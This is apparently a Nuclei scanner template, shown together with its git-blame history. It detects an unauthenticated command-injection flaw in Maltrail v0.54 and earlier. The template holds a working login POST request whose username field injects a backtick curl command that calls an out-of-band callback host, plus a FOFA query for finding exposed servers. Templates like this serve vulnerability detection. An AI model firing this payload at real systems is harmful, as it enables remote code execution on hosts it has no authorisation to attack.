nuclei-templates/http/vulnerabilities/other/maltrail-rce.yaml

id: maltrail-rce

info:
  name: Maltrail <= v0.54 - Unauthenticated OS Command Injection
  author: pussycat0x
  severity: critical
  description: |
    The subprocess.check_output function in mailtrail/core/http.py contains a command injection vulnerability in the params.get("username")parameter.
    An attacker can exploit this vulnerability by injecting arbitrary OS commands into the username parameter. The injected commands will be executed with the privileges of the running process. This vulnerability can be exploited remotely without authentication.
  remediation: Fixed in 0.55 Version
  reference:
    - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    - https://github.com/stamparm/maltrail/commit/a299967318cc226c18a6a07d1be708e3f21edd39
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Server: Maltrail"
  tags: huntr,maltrail,rce,oast,oos

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        username=;`curl {{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - contains(body,'Login failed')
          - contains(interactsh_protocol,'dns')
          - contains(content_type, "text/plain")
        condition: and

# digest: 490a0046304402204271303319b619aa2e03b44c47153a1a54da57224963740b028912e4dd2505d40220685f0134ebc4a755b23f247b203ebc03971eae2cf5b306e8aa6cd0aaea97d11f:922c64590222798bb761d5b6d8e72950
fix matcher 2023-08-21 07:01:34 +00:00			`id: maltrail-rce`

Maltrail <= v0.54 - Unauthenticated OS Command Injection 2023-08-19 16:40:28 +00:00			`info:`
			`name: Maltrail <= v0.54 - Unauthenticated OS Command Injection`
			`author: pussycat0x`
			`severity: critical`
			`description: \|`
			`The subprocess.check_output function in mailtrail/core/http.py contains a command injection vulnerability in the params.get("username")parameter.`
			`An attacker can exploit this vulnerability by injecting arbitrary OS commands into the username parameter. The injected commands will be executed with the privileges of the running process. This vulnerability can be exploited remotely without authentication.`
fix colon issue 2023-08-21 07:04:08 +00:00			`remediation: Fixed in 0.55 Version`
Maltrail <= v0.54 - Unauthenticated OS Command Injection 2023-08-19 16:40:28 +00:00			`reference:`
			`- https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/`
fix matcher 2023-08-21 07:01:34 +00:00			`- https://github.com/stamparm/maltrail/commit/a299967318cc226c18a6a07d1be708e3f21edd39`
Maltrail <= v0.54 - Unauthenticated OS Command Injection 2023-08-19 16:40:28 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
Maltrail <= v0.54 - Unauthenticated OS Command Injection 2023-08-19 16:40:28 +00:00			`fofa-query: "Server: Maltrail"`
templateman update 2023-10-14 11:27:55 +00:00			`tags: huntr,maltrail,rce,oast,oos`
Maltrail <= v0.54 - Unauthenticated OS Command Injection 2023-08-19 16:40:28 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /login HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`
			`X-Requested-With: XMLHttpRequest`
			`Origin: {{RootURL}}`
			`Referer: {{RootURL}}`

			username=;`curl {{interactsh-url}}`

			`matchers:`
fix matcher 2023-08-21 07:01:34 +00:00			`- type: dsl`
			`dsl:`
			`- contains(body,'Login failed')`
			`- contains(interactsh_protocol,'dns')`
			`- contains(content_type, "text/plain")`
			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402204271303319b619aa2e03b44c47153a1a54da57224963740b028912e4dd2505d40220685f0134ebc4a755b23f247b203ebc03971eae2cf5b306e8aa6cd0aaea97d11f:922c64590222798bb761d5b6d8e72950`